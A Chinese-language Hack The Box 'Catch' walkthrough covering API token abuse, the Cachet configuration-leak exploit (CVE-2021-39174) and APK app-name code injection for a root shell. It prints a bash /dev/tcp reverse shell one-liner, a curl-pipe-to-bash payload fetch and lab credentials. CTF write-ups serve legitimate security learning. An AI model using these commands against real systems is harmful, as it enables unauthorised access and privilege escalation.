Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限
Hack The Box-Catch
Hack The Box开始使用流程看这篇
文章目录
- Hack The Box-Catch
- 整体思路
- 1.Nmap扫描
- 2.apk文件信息收集
- 3.lets chat API利用
- 4.Cachet配置泄露漏洞利用
- 5.apk代码注入漏洞利用
- 工具汇总
- 漏洞利用
整体思路
1.Nmap扫描
当前靶机开启22,80,3000,5000,8000端口
扫描开启端口的具体信息,这里80、3000和5000都是http端口,一会挨个打开检查一下
2.apk文件信息收集
在浏览器地址栏输入IP,访问80端口的Web服务,在这个页面可以下载一个apk文件
使用jadax工具打开该apk文件(注:这里记得用root权限打开,否则会报错打不开)
搜索一下password和user值,结果中出现的基本都是十六进制,且没什么意义
再看一下当前代码文件中包含的token值(因为nmap结果中包含多个cookie),目前还不确定哪个有用,继续访问其他http页面
3000端口是catch应用的git库,且Gitea的版本是1.14.1,
访问gitea的API文档,尝试使用gitea的token获取信息
这里gitea的用户名未知,并且给定的token值也无效,无法继续进行
3.lets chat API利用
访问5000端口,这是一个let’s chat社交应用,正好符合另一个token,搜索它的API文档
这里可以使用GET或curl来获取目标API信息,具体命令为
GET/curl 10.129.40.171:5000/rooms -H 'Authorization: bearer Token'
根据API文档的提示,这里使用基础token无效,所以更换bearer token,利用jq对得到的信息进行整理,jq工具的具体用法会放在最后
接下来可以按照ID访问不同room中的message,得到用户john的密码,回到http页面尝试登陆
4.Cachet配置泄露漏洞利用
3000端口登陆失败,成功登入8000端口页面,并且这个页面用的是Cachet 2.4.0框架
搜索Cachet 2.4.0的相关漏洞,发现一个配置文件漏洞,该漏洞允许攻击者提取存储在配置文件中的机密信息
顺利找到该漏洞exp,使用命令
python3 exp.py -n john -p 'E}V!mywu_69T4C}W' -u http://10.129.40.56:8000/ -x http://127.0.0.1:8080
(密码加的是单引号,加别的会报错)
设置代理使用burpsuite观察漏洞利用过程,该漏洞主要是在邮箱地址输入${目标信息},获取用户名,密码等信息
经过注入成功得到新的用户凭证will:s2#4Fg0_%3!,尝试ssh登录
登陆成功,获取userflag
5.apk代码注入漏洞利用
现在用户权限已有,不需要进行横向提权,所以数据库以及发现用户密码方面暂时不用考虑,我们需要找系统漏洞,根据最开始得到的apk包得知,这是一个Andorid应用,所以可以去到管理移动应用的文件夹/opt/mdm,这里的verify.sh有一段命令,我们可以做代码注入,执行反弹shell命令
这是verify.sh的主函数,相当于main,这里提到执行的apk文件从/opt/mdm/apk_bin中提取,所以我们将apk文件上传到这个文件夹
在当前文件夹下查看正在运行的进程,可以看到有一个root权限的check.sh进程在反复运行,但是这个文件夹中只有一个verify.sh文件,我们开始尝试传入apk
按照app_check函数中给出的路径,我们使用apktool将开始下载的apk文件制作成文件夹,进入/appname/res/values/strings.xml文件,找到app_name,并注入代码
这里为了保险起见,将反弹shell的代码写入文件shell中,使用命令curl ip:port/shell | bash 的方式进行反弹
注入代码后,需要用apktool工具将文件夹重新打包成apk文件后上传(注:这里无法直接使用apktool命令,需要下载apktool的jar包)
这里反弹shell的命令为/bin/bash -i >& /dev/tcp/10.10.14.5/9001 0>&1
成功得到root用户shell
工具汇总
1.nmap
2.jadax
3.jq
4.burpsuite
5.apktool
漏洞利用
lets chat API利用
Cachet配置泄露漏洞利用(CVE-2021-39174)
继续加油 :)
Hack The Box - Catch 利用let chat API查询信息,Cachet配置泄露漏洞获取ssh登录密码,apk代码注入漏洞利用获取root权限相关推荐
- ML之MIC:利用某数据集计算机最大信息系数MIC并可视化MIC矩阵热图及其代码实现
ML之MIC:利用某数据集计算机最大信息系数MIC并可视化MIC矩阵热图及其代码实现 目录 利用某数据集计算机最大信息系数MIC并可视化MIC矩阵热图及其代码实现 实现结果 实现代码 利用某数据集计算 ...
- 第7节 利用win7漏洞绕过系统登录密码
利用win7漏洞绕过系统登录密码 1漏洞 2基础知识 3实操过程 4总结 1漏洞 在未登录系统时,连续按5次shift键,弹出程序c:\windows\system32\sethc.exe. 部分wi ...
- 命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass(空格,关键字过滤,变量绕过)-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping
命令执行 命令执行是一种攻击,其目标是通过易受攻击的应用程序在主机操作系统上执行任意命令.当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数. 比如PHP中的system,e ...
- /plus/recommend.php sql注入漏洞,DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 -
DedeCMS 全版本通杀SQL注入漏洞利用代码及工具 目前官方最新版已修复该漏洞 V5.7.37 GBK正式版20140228常规更新补丁 http://www.dedecms.com/pl/ ht ...
- 利用百度地图API查询任意两点间的车行距离、时间和通过的道路名称
最近做项目,领导让我分析一下某火车站的现状可达性.参考这两篇文章,我决定仿照来做一下. 链接: http://www.360doc.com/content/19/1102/23/32862047_87 ...
- Python爬虫安居客房价信息(并利用百度地图API查询坐标)
向AI转型的程序员都关注了这个号
- 利用百度地图API进行车辆查询并用鼠标拾点获取经纬度
利用百度地图API查询公交车线路位置信息以及鼠标取点的经纬度 先从官网申请秘钥http://lbsyun.baidu.com/ 2. 如果是用jsp写动态web项目,在jsp页面中引入js库,并且引入 ...
- ctfshow-WEB-web12( 利用代码执行漏洞读取敏感文件)
ctf.show WEB模块第12关是一个代码执行漏洞, flag藏在根目录下的一个文件中, 读取文件内容接口过关 进入页面后, 只有一句话 where is the flag? 按照以往的经验, 线 ...
- Hack The Box - Meta 利用Exiftool远程代码执行漏洞获取webshell,ImageMagrick命令执行漏洞横向提权,更改环境配置SUDO纵向提权
Hack The Box - Meta Hack The Box开始使用流程看这篇 文章目录 Hack The Box - Meta 整体思路 1.Nmap扫描 2.Exiftool远程代码执行漏洞( ...
最新文章
- GRUB启动过程分析 GRUB 引导程序配置
- android 注册、登录实现程序
- 13.Java为什么不支持多继承
- 正斜杠( / )和反斜杠( \ )的区别
- 信息学奥赛一本通(2070:【例2.13】数字对调)
- python的常用函数模块_(5)Python的常用模块函数
- Visual Assist X Options 常用宏
- red5流媒体服务器系统,red5 流媒体服务器配置
- 思维导图——史上最详细的计算机基础进制转换讲解
- Java常用命令与参数设置
- 叶笑嘴角露出来一个不知是什么意味的笑容
- Voters in Appalachia Struggling to Identify With Presidential Candidates
- 区间DP例题(持续更新)
- 前端做大屏显示,缩放比,分辨率怎样适配?
- Python:实现测试信用卡号码有效性credit card validator的算法(附完整源码)
- 云天励飞完成B轮融资,融资金额数亿元 1
- Android设计模式—代理模式★
- 第三方应用微信退款功能
- 关于VoltDB--全球最快的分布式内存数据库
- 解决几乎任何机器学习问题(完整翻译)